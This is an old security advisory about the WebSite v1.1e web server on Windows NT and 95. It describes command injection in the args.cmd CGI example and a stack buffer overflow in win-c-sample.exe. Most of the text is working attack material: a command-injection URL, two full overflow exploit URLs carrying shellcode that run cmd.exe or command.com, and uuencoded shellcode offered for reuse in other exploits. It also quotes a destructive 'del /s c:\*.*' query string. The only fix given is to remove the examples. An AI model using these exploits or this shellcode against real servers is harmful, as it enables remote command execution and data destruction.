COMMAND
buffer overflow
SYSTEMS AFFECTED
WinNT, Win95
PROBLEM
There're some nice security holes in WebSite v1.1e for Windows NT
and '95, in the CGI example programs.
The first thing that You will noticed is about the scripts, they
have the following lines in cgi-dos/args.cmd (and some others):
rem NEVER NEVER ECHO URL COMPONENTS UNQUOTED!!! Consider
rem a query string of xxx&del+/s+c:\*.* Your hard drive gets
rem erased!! Same goes for args and extra path info!!!
and then some lines like this:
echo QUERY_STRING="%QUERY_STRING%"
The exploit can be:
http://website.host/cgi-dos/args.cmd?"&any+dos+command"
There's also an example C program, compiled to
cgi-shl/win-c-sample.exe, with the source provided in
cgi-src/win-c-sample/win-c-sample.c, and the following line in
there:
char *argv[32]; // Max 32 command line args
That's a WinMain local variable, and is passed to SplitArgs(),
which does no bounds checking while filling it with the command
line parameters. You know what that means -- a nice buffer
overflow.
Here are the exploits (Solar splited the long URLs into several
lines), you can use any dos command in them (replace spaces with
_'s):
WinNT (any version?):
http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%
FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy
_\WebSite\readme.1st_\WebSite\htdocs\x1.htm
Win95 (the release version only, will crash others!):
http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0
3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\
x1.htm
The example dos commands just copy the WebSite's readme.1st file,
so you can later check if the exploit worked by trying
http://website.host/x1.htm. Note that the server should respond
to these exploits with an "Error: no blank line separating header
and data", because of the "1 file(s) copied" message appearing
without a blank line before it (which is required for HTTP; if
you need a command's output, you can redirect it to a file, and
get that file via HTTP with a separate request).
The solution Solar used in the exploits above is doing a call to
fixed kernel offset. Actually, the WinNT exploit does pattern
searches in the kernel (due to the number of different kernel
versions out there), while the Win95 one uses fixed offsets
(Solar don't have Win95 himself, thanks must go to Lord Byte for
loading his WinIce and telling him the offsets). The two
functions I use are WinExec and ExitProcess.
Here're the two shellcodes in binary, uuencoded, so you can use
them in your own exploits if you wish.
begin 644 shell_nt.bin
M:%Y8_^;_U(/&3&H!5HH&/%]U`X`N/T9!283`=?!H,!#P=UEH35QY6U@%,%!Z
F4$$Y`77P@^D0_]%H,!#P=UEHT%!V3%@%,#!V4$$Y`77P@^D<_]'[
`
end
begin 644 shell_95.bin
M:%Y8_^;_U(/&,FH!5HH&/%]U`X`N/T9!283`=?"Z=&]\7[ET8'U@`\K_T;I8
,7WQ?N5A0?&`#RO_1
`
end
Credit for this discovery goes to Solar Designer.
SOLUTION
Just remove the examples after You, the Webmaster, have checked
them out. Also, the holes will probably get fixed in the next
WebSite release.